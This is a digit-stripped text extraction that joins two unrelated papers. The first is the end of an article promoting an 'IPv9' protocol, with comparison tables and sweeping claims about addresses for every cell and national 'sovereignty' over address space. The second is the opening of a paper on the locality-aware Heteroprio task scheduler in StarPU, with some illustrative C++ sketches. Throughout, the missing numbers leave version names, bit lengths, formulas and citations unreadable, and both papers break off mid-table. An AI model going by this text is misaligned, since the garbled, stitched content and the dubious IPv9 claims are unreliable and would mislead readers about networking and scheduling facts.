mildly, if ipv were widely used, every grain of sand in the world would have an ip address. then after ipv is widely used, the smallest molecule of bright matter in the whole universe will have a corresponding address. it is no exaggeration to say that if ipv is fully applied, every cell and living gene in the world can be assigned to an ipv address. layer is the asset management address (including legal digital currency space) compatible with ean-ucc barcode length. ) route tables are smaller international journal of advanced network, monitoring and controls volume , no. , ipv has a smaller routing table than ipv . the address allocation of ipv follows the principle of aggregation at the beginning, which enables the router to represent a subnet with an entry in the table, this greatly reducing the length of routing table in the router, and improving the speed of forwarding packets in the routing table. the routing table of ipv is very small, and the address allocation of ipv follows the principle of geo-spatial clustering from the beginning, which enables ipv router to represent a country subnet and an application subnet with a single record, it greatly reducing the length and cleanliness of routing table in the router, and improving the speed of forwarding packets by routing table. 
at the same time, this subnet can express a specific geographical location, for example, we assign the ipv address segment of shanghai as [ [ ]/ , then in other routers of the same level, only one route pointing to the address segment of [ [ ]/ can realize the ipv address routing of shanghai. according to this logic, only one route is needed from country to country. for example, the route to china is / . the ipv routing table is large and irregular, and the ipv routing table is smaller than ipv , but the ipv routing table contains no geographic information and the routing is messy. ) automatic configuration support ipv adds support for automatic configuration of variable length addresses, which is an improvement and extension of dhcp protocol of ipv , making network management more convenient. ipv supports multicast, and supports the iso/iec c future network << naming and addressing >>tcp/ip/m model, and supports long packet code streams for virtual and real circuits. this allows multimedia applications on the web to ensure video quality and reduce overhead, provide faster and faster applications such as industrial controls and unmanned vehicles, and provide better and cheaper service over the internet than ipv . ) address length could be select ipv address length has a variety of options, which can realize the change of , , , , , and bit address length, and select the most appropriate address length according to different usage scenarios to reduce the routing overhead. ) dual encryption the address length of ipv is long enough to realize dual encryption from the transmission of source and target addresses, which plays an important role in some specific network transmission fields. ) add location information to the address ipv addresses can be embedded with geo-location information, as well as personal and industry id information, this making ip addresses uniquely tied to personal information. ) compatible with previous addresses ipv address is backward compatible with ipv /ipv address. in order to absorb the upgrade difficulty of ipv incompatibility with ipv , ipv protocol remains and unchanged, so that ipv /ipv upgrade to the new version of ipv , the upgrade cost is very low. ) sovereignty is different ipv /ipv addresses spaces and copyright ownership: united states. ipv address space and copyright ownership: china. iv. feature of ipv ipv technology has many features; a comparison of ipv and ipv , ipv features is listed below. javascript:; international journal of advanced network, monitoring and controls volume , no. , table i. comparison between ipv and ipv item ipv ipv bit length address format dot decimal, uncompressible [ ] bracket decimal notation, with zero compression, can be compressed on both sides network express mask or length prefix representation length prefix express that supports public geographic space clustering loop address . . . [ ] public address common public ip address aggregate global address location unicast addresses automatic configuration automatically configured address ( . . . / ) link-local address: [ / broadcast address contains broadcast address no broadcast address, transitional support broadcast address unspecified address . . . 
[ ] domain name resolution ipv host address(a) resource record ipv host address (aaaaaaaa) resource record mother root server space bits ( - addresses) realized bits ( - addresses) design objective bits root domain server name letters from a to m letters from n to z china top-level domain .cn .chn inverse resolution in-addr.apra domain in-addr.apra domain compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]x:x:x:x:x:x:d.d.d.d compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]y]y]y]d.d.d.d transition address no transition address ipv :[ ]d.d.d.d 简写 j.j.j.j encryption no ip address encryption dual encrypted of the source address and the destination address address length fixed bits not fixed,canbe 、 、 、 、 、 、 bits geographic information no geographic location information geographic location information can be embedded dhcp nonsupport dhcp added support for automatic configuration of variable - length addresses iso/iec c & tcp/ip/m model not supported supported communication rules communicate first, then verify verify before communication network model tcp/ip tcp/ip/m sovereign america china international journal of advanced network, monitoring and controls volume , no. , table ii. comparisons between ipv and ipv item ipv ipv bit length address format colon-separated hexadecimal with zero compression, single compression [ ] [ ] bracket decimal notation, with zero compression, can be compressed on both sides network express mask or length prefix representation length prefix express that supports public geographic space clustering loop address :: [ ] public address can aggregate the global single point transmission address aggregate global address location unicast addresses link-local address fe ::/ [ / broadcast address no no broadcast address, transitional support broadcast address unspecified address : : : : : : : : [ ] domain name resolution ipv host address(aaaa) resource record ipv host address (aaaaaaaa) resource record mother root server space bits ( - addresses) realized bits ( - addresses) design objective bits root domain server name letters from a to m letters from n to z china top-level domain .cn .chn inverse resolution ip .int domain in-addr.apra domain compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]x:x:x:x:x:x:d.d.d.d compatibility incompatible with ipv addresses compatible ipv address:y]y]y]y]y]y]y]d.d.d.d transition address no transition address ipv :[ ]d.d.d.d 简写 j.j.j.j encryption no ip address encryption dual encrypted of the source address and the destination address address length fixed bits not fixed,canbe 、 、 、 、 、 、 bits geographic information no geographic location information geographic location information can be embedded dhcp support dhcp, no automatic configuration for variable-length addresses added support for automatic configuration of variable - length addresses network model tcp/ip tcp/ip/m iso/iec c & tcp/ip/m mode not supported supported communication rule communicate first, then verify verify before communication network model tcp/ip tcp/ip/m sovereign america china international journal of advanced network, monitoring and controls volume , no. , v. conclusions the ipv protocol uses - arabic digital network as the virtual ip address and uses decimal as the text representation method, which is a convenient way to find online users. 
ipv has a large number of assignable ip addresses, and the maximum number of address bits is × in order to improve efficiency and facilitate end users, some addresses can be used directly as domain names, which is the cornerstone of the future digital world. at the same time, ipv is also called "new generation security and reliable information integrated network protocol" because it uses the classification and coding of the original computer network, cable broadcast television network and telecommunication network. ipv technology and the whole network architecture make china to be the second country in the world with complete future network architecture. this paper introduces the generation process and characteristics of ipv , and compared with the existing internet, with the continuous optimization and improvement of ipv future network, it will be applied in many other countries. references [ ] xie jianping etc.method of using whole digital code to assign address for computer [p]. us: , . . [ ] s. deering, r. hinden, network working group. internet protocol, version (ipv )-specification, rfc- , . . [ ] m. crawford. network working group. transmission of ipv packets over ethernet networks.rfc- , . . [ ] j. onions, network working group. a historical perspective on the usage of ip version . rfc . . . [ ] cerf, network working group. a view from the st century, rfc . . . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . [ ] radio frequency identification tag information query service network architecture technical specification. sj/t - , . [ ] soliman h., castelluccia c., malki k. e., bellier l. hierarchical mobile ipv (hmipv ) [ ] johnson d., perkins c., arkko j. mobility support in ipv ,” rfc , june . [ ] perkins c.e. ip mobility support for ipv ”, ietf rfc , jan. [ ] farinacci d., fuller v., meyer d., lewis d. interworking lisp with ipv and ipv ”, draft-ietf- lisp-interworking- , aug. [ ] meyer k.f.d., & zhang l. rfc : report from the iab workshop on routing and addressing, september . [ ] dommety g., & jain r. potential networking applications of global positioning systems (gps), technical report tr- , the ohio state university ( ). [ ] recommendation itu-t y. identification framework in future networks [ ] itu-t y. ( ), framework of node identifier and locator separation in ipv -based next generation networks [ ] itu-t y. ( ), ngn identity management framework [ ] itu-t y. ( ), identification framework in future networks [ ] ietf rfc , hierarchical mobile ipv mobility management (hmipv ) [ ] ietf rfc ( ), the naming authority pointer (naptr) dns resource record impact study of data locality on task-based applications through the heteroprio scheduler hal id: hal- https://hal.inria.fr/hal- submitted on may hal is a multi-disciplinary open access archive for the deposit and dissemination of sci- entific research documents, whether they are pub- lished or not. the documents may come from teaching and research institutions in france or abroad, or from public or private research centers. l’archive ouverte pluridisciplinaire hal, est destinée au dépôt et à la diffusion de documents scientifiques de niveau recherche, publiés ou non, émanant des établissements d’enseignement et de recherche français ou étrangers, des laboratoires publics ou privés. impact study of data locality on task-based applications through the heteroprio scheduler bérenger bramas to cite this version: bérenger bramas. 
impact study of data locality on task-based applications through the heteroprio scheduler. peerj computer science, peerj, , , pp.e . � . /peerj-cs. �. �hal- � https://hal.inria.fr/hal- https://hal.archives-ouvertes.fr impact study of data locality on task-based applications through the heteroprio scheduler bérenger bramas camus team, inria nancy—grand est, illkirch-graffenstaden, france abstract the task-based approach has emerged as a viable way to effectively use modern heterogeneous computing nodes. it allows the development of parallel applications with an abstraction of the hardware by delegating task distribution and load balancing to a dynamic scheduler. in this organization, the scheduler is the most critical component that solves the dag scheduling problem in order to select the right processing unit for the computation of each task. in this work, we extend our heteroprio scheduler that was originally created to execute the fast multipole method on multi-gpus nodes. we improve heteroprio by taking into account data locality during task distribution. the main principle is to use different task-lists for the different memory nodes and to investigate how locality affinity between the tasks and the different memory nodes can be evaluated without looking at the tasks’ dependencies. we evaluate the benefit of our method on two linear algebra applications and a stencil code. we show that simple heuristics can provide significant performance improvement and cut by more than half the total memory transfer of an execution. subjects distributed and parallel computing keywords scheduling, task-based, starpu, hpc, data locality introduction high-performance computing (hpc) is crucial to make advances and discoveries in numerous domains. however, while supercomputers are becoming more powerful, their complexity and heterogeneity also increase; in , a quarter of the most powerful supercomputers in the world are equipped with accelerators (see https://www.top .org/), and the majority of them (including the top two on the list) uses gpus in addition to traditional multi-core cpus. the efficient use of these machines and their programmability are ongoing research topics. the objectives are to allow the development of efficient computational kernels for the different processing units and to create the mechanisms to balance the workload and copy/distribute the data between the cpus and the devices. furthermore, this complexity forces some of the scientific computing developers to alternate computation on cpus or gpus, but never use both at the same time. this naive parallelization scheme usually provides a speedup compared to a cpu-only execution, but it ends in wastage of computational resources and utilization of extra barrier synchronizations. meanwhile, the hpc community has proposed several strategies to parallelize applications on heterogeneous computing nodes with the aim of using all available resources. among the existing methods, the task-based approach has gained popularity: mainly because it how to cite this article bramas b. . impact study of data locality on task-based applications through the heteroprio scheduler. peerj comput. sci. :e doi . /peerj-cs. submitted january accepted april published may corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor john owens additional information and declarations can be found on page doi . /peerj-cs. copyright bramas distributed under creative commons cc-by . https://www.top .org/ http://dx.doi.org/ . /peerj-cs. 
mailto:berenger.�bramas@�inria.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ makes it possible to create parallel codes with an abstraction of the hardware by delegating the task distribution and load balancing to dynamic schedulers. in this method, the workload is split into inter-dependent computational elements and is managed by a runtime system (rs). there are several rs reported in the literature (danalis et al., ; kale & krishnan, ; perez, badia & labarta, ; gautier et al., ; bauer et al., ; tillenius, ), and each of them has its own specificity and interface. we refer to a comparative study (thoman et al., ) for a detailed description where the different aspects and features of rs are categorized. task-based method is a viable solution to use modern heterogeneous computing nodes and mix computation between cpu and devices. furthermore, the potential of this approach has already been proven on numerous computational methods. in the task-based method, the scheduler is in charge of the most important decisions, as it has to decide the order of computation of the ready tasks (the tasks that have their dependencies satisfied) as well as where those tasks should be computed. in the present study, we implemented our scheduler inside a rss called starpu (augonnet et al., ), which supports heterogeneous architectures and allows customizing the scheduler in an elegant manner. in our previous work, we created the heteroprio scheduler to execute the fast multipole method (fmm) using starpu on computing nodes equipped with multiple gpus (agullo et al., b). heteroprio was first implemented inside scalfmm (bramas, ), and it was later included in starpu. it is publicly available and usable by any starpu-based code. in fact, heteroprio was later used in linear algebra applications where it demonstrated its robustness and potential, see qrmumps (agullo et al., ) and spldlt (lopez & duff, ). moreover, it was also the subject of theoretical studies (beaumont et al., ; beaumont, eyraud-dubois & kumar, , ; agullo et al., a), which revealed its advantages and gave a positive theoretical insight on the performance. however, the original heteroprio scheduler does not take into account data locality. the distribution of the tasks—the choice of the processing unit that will compute a given task—is done without considering the distribution of the data. therefore, depending on the applications and the test cases, heteroprio can not only lead to huge data movement between cpus and gpus but also between gpus, which dramatically penalizes the execution. the current work proposed different mechanisms to consider data locality in order to reduce the data transfers and the makespan. the contributions of this paper are as follows: � we summarize the main ideas of the heteroprio scheduler and explain how it can be implemented in a simple and efficient manner; � we propose new mechanisms to include data locality in the heteroprio scheduler’s decision model; � we define different formulas to express the locality affinity for a given task relative to the different memory nodes. 
those formulas are based on general information regarding the hardware or the data accesses; � we evaluate our approach on two linear algebra applications, qrmumps and spldlt, and a stencil application, and analyze the effect of the different parameters. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the rest of the paper is organized as follows. in the section “background,” we introduce the task-based parallelization and the original heteroprio scheduler. then, in the section “introducing laheteroprio,” we detail our new methods to use data locality and the different mechanisms of our locality-aware heteroprio (laheteroprio) scheduler. finally, we evaluate our approach in the section “performance study” by plugging in the laheteroprio inside starpu to execute two different linear algebra applications using up to four gpus. background task-based parallelization the task-based approach divides an application into interdependent sections, called tasks, and provides the dependencies between them. these dependencies allow valid parallel executions, that is, with a correct execution order of the tasks and without race conditions. this description can be viewed as a graph where the nodes represent the tasks and the edges represent the dependencies. if the edges represent a relation of precedence between the tasks, the resulting graph is a direct acyclic graph of tasks. however, this is not the case when an inter-tasks dependency relation is used, such as a mechanism to express that an operation is commutative (agullo et al., ). in the paper, we consider graphs of the form g = (v, e) with a set of nodes v and a set of edges e. considering t ,t ∈ v, there exists a relation (t ,t ) ∈ e—also written t ! t —if the task t can be executed only after the task t is over. a task t is a computational element that is executable on one or (potentially) several different types of hardware. when t is created, it incorporates different interchangeable kernels where each of them targets a different architecture. for example, consider a matrix-matrix multiplication task in linear algebra: it could be either a call to cublas and executed on a gpu, or a call to intel mkl and executed on a cpu, but both kernels return a result that is considered equivalent. task t accesses data either in read, read-write or write and in the rest of the paper we consider equivalent the read-write and the write accesses. we denote t.data to be the set of data elements that t will access during its execution. from this information, that is, g = (v, e) and the portability of the tasks, the scheduler must decide the order of computation and where to execute the tasks. task scheduling and related work scheduling can be done statically or dynamically, and in both cases, finding an optimal distribution of the tasks is usually np complete since the solution must find the best computing order and the best processing unit for each task (peter brucker, ). the static approaches have a view on the complete set of tasks before the beginning of the execution (baptiste, pape & nuijten, ), and thus can use expensive mechanisms to analyze the relationship between the tasks. advanced strategies are also used, such as duplicating tasks to replace communications with computation (he et al., ). it is worth mentioning that these strategies can have significant overhead compared to their benefit and the execution time of the tasks, which make them unusable in real applications. 
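To make the task model described in the Background section concrete, the following is a small C++ sketch (illustrative only; the types and names are assumptions, not code from the paper or from StarPU) of a task that carries one interchangeable kernel per architecture together with its data dependencies and their access modes, read-write being folded into write as stated in the text.

#include <cstddef>
#include <cstdio>
#include <functional>
#include <string>
#include <vector>

// Access modes: read-write and write are treated as equivalent, as in the text.
enum class Access { Read, Write };

struct DataHandle {
    std::string name;   // identifier of the piece of data
    std::size_t size;   // size in bytes
};

struct DataDep {
    DataHandle* handle;
    Access mode;
};

// A task carries one interchangeable kernel per architecture type.
struct Task {
    int priority_cpu = 0;                 // one priority per processing-unit type
    int priority_gpu = 0;
    std::function<void()> cpu_kernel;     // empty if not runnable on CPU
    std::function<void()> gpu_kernel;     // empty if not runnable on GPU
    std::vector<DataDep> data;            // t.data with access modes
    bool runnable_on_gpu() const { return static_cast<bool>(gpu_kernel); }
};

int main() {
    DataHandle a{"A", 1024}, b{"B", 2048};
    Task gemm;
    gemm.cpu_kernel = [] { std::puts("GEMM on CPU (e.g., a BLAS call)"); };
    gemm.gpu_kernel = [] { std::puts("GEMM on GPU (e.g., a cuBLAS call)"); };
    gemm.data = { {&a, Access::Read}, {&b, Access::Write} };
    // The runtime may pick either kernel; both are considered to produce an
    // equivalent result, as in the matrix-matrix multiplication example.
    (gemm.runnable_on_gpu() ? gemm.gpu_kernel : gemm.cpu_kernel)();
}

With such a per-task description and the dependency graph, a scheduler has all the information it needs to decide the order of computation and the processing unit for each task.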
bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ static scheduling requires performance models, so it can predict the duration of the tasks on the different architectures and the duration of the communications. even, if it is possible to build such systems, they require costly calibration/evaluation stages and their resulting prediction models are not always accurate, especially in the case of irregular applications. moreover, these approaches cannot adapt their executions to the unpredictable noise generated by the os or the hardware. this is why most task-based applications use rss that are powered with dynamic scheduling strategies (akbudak et al., ; sukkari et al., ; moustafa et al., ; carpaye, roman & brenner, ; agullo et al., b). in this case, the scheduler focuses only on the ready tasks and decides during the execution on how to distribute them. it has been demonstrated that these strategies are able to deliver high performance with reduced overhead. the scheduler becomes a critical layer of the rs, at the boundary between the dependencies manager and the workers, see fig. . we follow the starpu’s terminology and consider that a scheduler has an entry point where the ready tasks are pushed, and it provides a request method where workers pop the tasks to execute. in starpu, both pop/push methods are directly called by the workers that either release the dependencies or ask for a task. consequently, assigning a task to a given worker means to return this task when the worker calls the pop method. as an intuitive example, consider a priority-based scheduler designed to manage priorities with one task-list per priority. the push method can simply store a newly ready task t in the right list list[t.priority].push_back(t). meanwhile, the pop method can iterate over the lists and when it finds one non-empty list, it pops a task from it. furthermore, in the case of heterogeneous computing, a pop must return a task compatible with the worker that performs the request. managing data locality was already a challenge before the use of heterogeneous computing because of numa hardware and a simple scheduling strategy has been proposed to improve data locality on the numa nodes (al-omairy et al., ). past work has introduced distance-aware work-stealing scheduling heuristics within the ompss runtime, targeting dense linear algebra applications on homogeneous x hardware. while figure schematic view of task-based runtime system organization. a program can be described using the sequential task flow (stf) model and converted into tasks/dependencies by the rs. when dependencies are released, the newly ready tasks are pushed into the scheduler. when a worker is idle, it calls the pop function of the scheduler to request a task to execute. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the method provides a significant speedup, it does not take into account the different data accesses (read or write) or look at the cache levels to find data replication. the importance of data locality to move forward with exascale computing has been emphasized (unat et al., ) with a focus on task-based rss. the authors shown that data movement is now the primary source of energy consumption in hpc. 
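As a companion to the intuitive push/pop example given above, here is a minimal C++ sketch of a priority-list scheduler exposing the same interface (an assumption-laden illustration, not the StarPU API): push stores a newly ready task in the list of its priority in constant time, and pop scans the lists and returns the first task compatible with the requesting worker.

#include <cstdio>
#include <deque>
#include <optional>
#include <vector>

struct Task {
    int priority = 0;
    bool has_cpu_kernel = true;
    bool has_gpu_kernel = false;
};

enum class WorkerType { Cpu, Gpu };

class PriorityListScheduler {
public:
    explicit PriorityListScheduler(int nb_priorities) : lists_(nb_priorities) {}

    // Called when a task becomes ready: O(1).
    void push(const Task& t) { lists_[t.priority].push_back(t); }

    // Called by an idle worker: scan priorities from highest to lowest and
    // return the first task that this worker can actually execute.
    std::optional<Task> pop(WorkerType worker) {
        for (int p = static_cast<int>(lists_.size()) - 1; p >= 0; --p) {
            auto& list = lists_[p];
            for (auto it = list.begin(); it != list.end(); ++it) {
                const bool compatible = (worker == WorkerType::Cpu) ? it->has_cpu_kernel
                                                                    : it->has_gpu_kernel;
                if (compatible) {
                    Task t = *it;
                    list.erase(it);
                    return t;
                }
            }
        }
        return std::nullopt;  // nothing compatible is ready
    }

private:
    std::vector<std::deque<Task>> lists_;  // one task-list per priority
};

int main() {
    PriorityListScheduler sched(3);
    sched.push({2, true, true});
    sched.push({1, true, false});
    if (auto t = sched.pop(WorkerType::Gpu)) std::printf("GPU got priority %d\n", t->priority);
    if (auto t = sched.pop(WorkerType::Cpu)) std::printf("CPU got priority %d\n", t->priority);
}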
in era of heterogeneous computing, the community has provided various strategies to schedule graphs of tasks on this kind of architecture, and one of the most famous is the heterogeneous earliest finish time (heft) scheduler (topcuoglu, hariri & wu, ). in heft, tasks are prioritized based on a heuristic that takes into account a prediction of the duration of the tasks and the data transfers between tasks. different models exist, but on a heterogeneous computing node, the duration of a task can be the average duration of the task on the different types of processing unit. more advanced ranking models had been defined (shetti, fahmy & bretschneider, ). however, this scheduler has two limitations that we would like to alleviate. first, it uses a prediction system, which may need an important tuning stage and may be inaccurate, as we previously argued. second, even if ranking a set of tasks can be amortized and beneficial, re-ranking the tasks to consider new information concerning the ongoing execution can add a dramatic overhead. this is why we have proposed an alternative scheduler. heteroprio multi-priorities within heteroprio, we assign one priority per processing unit type to each task, such that a task has several priorities. each worker pops the task that has the highest priority for the hardware type it uses, which are cpu or gpu in the present study. with this mechanism, each type of processing unit has its own priority space. this allows to continue using priorities to manage the critical path, and also to promote the consumption of tasks by the more appropriate workers: workers do first what they are good at. the tasks are stored inside buckets, where each bucket corresponds to a priority set. then each worker uses an indirect access array to know the order in which it should access the buckets. moreover, all the tasks inside a bucket must be compatible with all the processing units that may access it (at least). this allows an efficient implementation. as a result, we have a constant complexity for the push and complexity of o(b) for the pop, where b is the number of buckets. the number of buckets b corresponds to the number of priority groups, which is equal to the number of different operation types in most cases. a schematic view of the scheduler is provided in fig. . for illustration, let us consider an application with four different types of task ta, tb, tc and tc′ (here tc and tc′ can be the same operation but with data of small or large granularity, respectively). tasks of types ta, tc and tc′ provide a kernel for cpu and gpu and thus are executable on both, but tasks of type tb are only compatible with cpus. consequently, we know that gpu workers do not access the bucket where tb tasks are stored. then, we consider that the priorities on cpu are pcpu(ta) = , pcpu(tb) = , pcpu(tc) = and pcpu(tc′) = ; on gpu the priorities are pgpu(ta) = , pgpu(tc) = and pgpu(tc′) = . we highlight that tc and tc′ have the same priority for gpu workers. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ from this configuration, we end with four buckets: b = {ta}, b = {tb}, b = {tc} and b = {tc′}. finally, the indirect access arrays are acpu = { , , , } and agpu = { , , } with agpu = { , , } being valid as well. speedup factors the speedup factors are used to manage the critical moments when a low number of ready tasks are available. 
the idea is to forbid some workers to get a task from a set of buckets when their corresponding hardware type is not the fastest to compute the buckets’ tasks. to do so, the type of processing unit that is the fastest in average to execute the bucket’s tasks, is provided for each bucket. additionally, we input a number that indicates by how much this processing unit type is faster compared to the other types of processing units. these numbers are used to define a limit under which the slow workers cannot pick a task. as an illustration, let us consider two types of processing units: cpu and gpu. let si be the speedup factor for bucket i and let gpu be the fastest type to compute the task stored in i. a cpu worker can take a task from bucket i if there are more than ngpu � si available tasks in it, where ngpu is the number of gpu workers. for example, if there are three gpu workers and that a gpu is two times faster in average than a cpu to perform a given operation, then a cpu worker takes a task only if there are six or more tasks available. otherwise, it considers the bucket empty and continues to the next ones to find a task to compute. this means that for the example given in the section “multi-priorities,” we have two arrays of four items for the different operations, one to tell which processing units is the fastest, and a second one to provide the speedup. the description of the example tells us that the gpu cannot compute ta, so cpu are the fastest by default, and that tc and tc′ are the same operation but with different granularities, such that the speedup for the gpu will be higher for tc′ than tc. as a results, the arrays could be best = {cpu, gpu, gpu, gpu} and speedup = { , . , . , }. this system is used for each bucket individually and not globally. therefore, if the number of buckets is large, this can lead to overflowing some workers and artificially keeping others idle. however, we found that in practice it provides beneficial results especially at the end of simulations. figure heteroprio schematic view. tasks are pushed inside the buckets. each worker iterates on the buckets based on the priorities for the hardware it uses. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ introducing laheteroprio d task-list grid by splitting the buckets per memory nodes our first step in managing data locality is to subdivide each bucket into m different task- lists and set up one list for each of the m memory nodes. for example, if the machine is composed of two gpus and one cpu, we have three task-lists per bucket by considering numa memory nodes as a single one, without loss of generality. we obtain a d grid of task-lists g where the different buckets are in the first dimension and the memory nodes are in the second dimension, as illustrated in fig. . we store in the list g(b,m) all the tasks of the bucket index b that we consider local to the memory node m. in this context, local means that an execution on a processing unit connected to m should have the lowest memory transfer cost. the list g(b,m) can also contain tasks that processing units connected to m cannot compute. this can happen when m is a gpu and the tasks of bucket index b do not provide a gpu function. 
nevertheless, when workers steal tasks from g(b,m), we know that they have the highest affinity for the memory node m even if it is impossible to compute these tasks on a attached processing unit. from this description, we must provide a mechanism to find out the best memory node for every newly ready task, to push the tasks in the right list, and also decide how the workers should iterate on g and select a task. extending the example from the sections “multi-priorities” and “speedup factors,” the number of tasks list in each bucket is hardware specific because it corresponds to the number of memory nodes. task insertion in the grid with locality evaluation (push) in the original heteroprio, there is no choice where a given task has to be stored, as it must be in the list of its corresponding bucket, that is, in scheduler.list[task.bucket].push_back (task). on the other hand, in laheteroprio we have to decide in which list of the selected bucket we should put the task; we have to find the best m in scheduler.list[task. bucket][m].push_back(task). therefore, we propose different formulas to estimate the locality of a task regarding the memory nodes and the distribution of the data it uses. b u ck e ts figure laheteroprio schematic view of a grid composed of four buckets and three memory nodes. the decision that the scheduler has to do is to put the tasks in the more appropriate lists and to decide how the workers iterate on the grid. full-size doi: . /peerj-cs. /fig- bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the specificity of this approach is to determine the most suitable memory node without looking at the algorithm itself. we only look at each task individually without following the links it has with some other tasks and without making a prediction of how the pieces of data are going to move. last recently used in this strategy, we consider that the memory node related to the worker that pushes the task has the best locality; a newly ready task t released by worker w is pushed into g(t.bucket_id, w.memory_node). indeed, t and the last task executed by w have at least one data dependency in common, and this data is already on the memory node if it has not been evicted. the main advantage of this technique is its simplicity and low overhead. however, it is obviously far from accurate. for example, it does not evaluate the amount of data that is already available on the memory node compared to the total amount of data that t will use. moving cost estimation seems natural to consider that the best memory node is the one that will allow moving the data in the shortest time. starpu provides the function starpu_task_expected _data_transfer_time_for that predicts this transfer duration by looking where the pieces of data are and the possible transfer paths between the memory nodes. from this prediction, we obtain a moving cost and we refer to it as mc_starpu. data locality affinity formulas starpu’s prediction has two potential drawbacks: the first is that it treats all data dependencies similarly without making a distinction if the dependencies are read or write, and the second is that the memory transfer predictions are difficult to achieve since they are based on models that can be inaccurate and influenced by the on-going execution. 
therefore, we propose different formulas to estimate the locality of a task and we obtain either a locality score for each memory node (the higher the better), or a moving cost (the lower the better). this information is used to decide where to put the newly ready tasks in the grid. in our next formulas, we use the following notations dt;m ¼ t:data \ m:data; ( ) dt;:m ¼ t:data \ :m:data; ( ) dreadt;m ¼ t:data \ m:data \ read; ( ) dwritet;m ¼ t:data \ m:data \ write; ( ) read \ write ¼ [: ( ) here, dt,m is the set of data used by task t and that exist on memory node m, whereas dt,¬m represents the set of data used by t that is not on m. d read t,m and d write t,m are the sets of data used by t that exist on m and that are accessed in read mode and write mode, respectively. bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we define the sum of all the pieces of data hosted (ls_sdh) with the score given by ls sdhðm; tÞ ¼ x d dt;m d:size: ( ) the core idea of ls_sdh is to consider that the memory node that already hosts the largest amount of data (in volume) needed by t is the one where t has to be executed. if all the tasks use different/independent pieces of data and each of them is used once, then we except that both mc_starpu and ls_sdh(m,t) return meaningful scores. however, there are other aspects to consider. for example, if there is a piece of data duplicated on every node it should be ignored. moreover, we can also consider that a piece of data used in read is less critical than the ones used in write for multiple reasons. a piece of data used in read might be used by several tasks (in read) at the same time, and thus the transfer cost only impacts the first task to be executed on the memory node. in addition, a piece of data in write is expected to be used in read later on, which means that moving a piece of data that will be accessed in write on a memory node, partially guarantees that this data will be re-used soon. finally, writing on a set of data invalidates all copies on other memory nodes. thus, we define three different formulas based on these principles, where we attribute more weight to the write accesses to reduce the importance of the read accesses. the ls_sdh is the score given by summing the amount of data already on a node, but the difference with ls_sdh is that each data in write is counted in a quadratic manner ls sdh ðm; tÞ ¼ x d dreadt;m d:size @ a þ x d dwritet;m d:size @ a: ( ) alternatively, we propose the ls_sdhb score where we sum the amount of data on a node but we balance the data in write with a coefficient h. moreover, we consider that for the same amount of data on two memory nodes, the one that has more pieces of data should be prioritized. in other words, transferring the same amount of data but with more items is considered more expensive. the formula is given by ls sdhbðm; tÞ ¼ x d dreadt;m d:size @ a þ u � �ðdwritet;m Þ � x d dwritet;m d:size @ a: ( ) we set h = , for the rest of the study as it provides an important load to the data in write without canceling the cost of huge transfer for data in read. finally, we propose the lc_smwb cost formula lc smwbðm; tÞ ¼ x d dreadt;:m d:size @ a þ x d dwritet;:m d:size � � �ðt:data \ writeÞ �ðt:dataÞ @ a: ( ) bramas ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ in lc_smwb, we sum the amount of data that is going to be moved, but we use an extra coefficient for the data in write. this coefficient takes the value if all the data used by t are in write, but it gets closer to as the number of data dependencies in read gets larger than the number of data dependencies in write. examples of memory node selection table illustrates how the formulas behave and which memory nodes are selected for different configurations. this example shows that the formulas can select different memory nodes depending both on the number of data dependencies in read/write and their sizes. automatic dlaf selection we propose several data locality affinity formulas (dlaf) but only one of them is used to find out the best memory node when a newly ready task is pushed into the scheduler. we describe here our mechanism to automatically select a dlaf during the execution by comparing their best memory node difference (bmd) values. a bmd value indicates the robustness of a dlaf by counting how many times it returns a different node id when a task is pushed or popped. more precisely, every time a task t is pushed, we call a dlaf to know which of the memory nodes is selected to execute the task, and we store this information inside the scheduler. then, every time a task is popped, we call again the same dlaf to know which of the memory node seems the more appropriate to execute the task, and we compare this value with the one obtained at push time, as illustrated by fig. . if both values are different, we increase the bmd counter. a low bmd value means that the dlaf is robust to the changes in the memory during the push/pop elapsed time. we consider that this robustness is a good metric to automatically select a dlaf, and thus we continually compared the bmd counters of all dlaf, and use the one that has the lowest value to select the list where to push the tasks. iterating order on the lists of the grid (pop) in this section, we describe how the workers iterate over the task-lists of g. table examples of memory node selection by the proposed dlaf for different tasks and data configurations. tasks(data/access mode/size, : : : ) mn hosts mn hosts mn hosts ls_dh winner ls_sdh winner ls_sdhb winner lc_smwb winner t(a/r/ , b/w/ ) a a b mn{ , , } mn{ , , } mn mn t(a/r/ , b/w/ ) a a b b mn mn mn mn t(a/w/ , b/w/ , c/w/ ) a b c a c mn mn mn mn t(a/w/ , b/w/ , c/w/ ) a b a b a c mn{ , , } mn{ , , } mn{ , , } mn{ , , } t(a/r/ , b/r/ , c/w/ , d/w/ ) a b a c c d mn mn mn mn t(a/w/ , b/w/ , c/w/ , d/w/ ) a d c b d mn mn mn mn t(a/w/ , b/w/ , c/w/ , d/w/ ) a d c b d mn{ , } mn mn mn{ , } note: the memory nodes 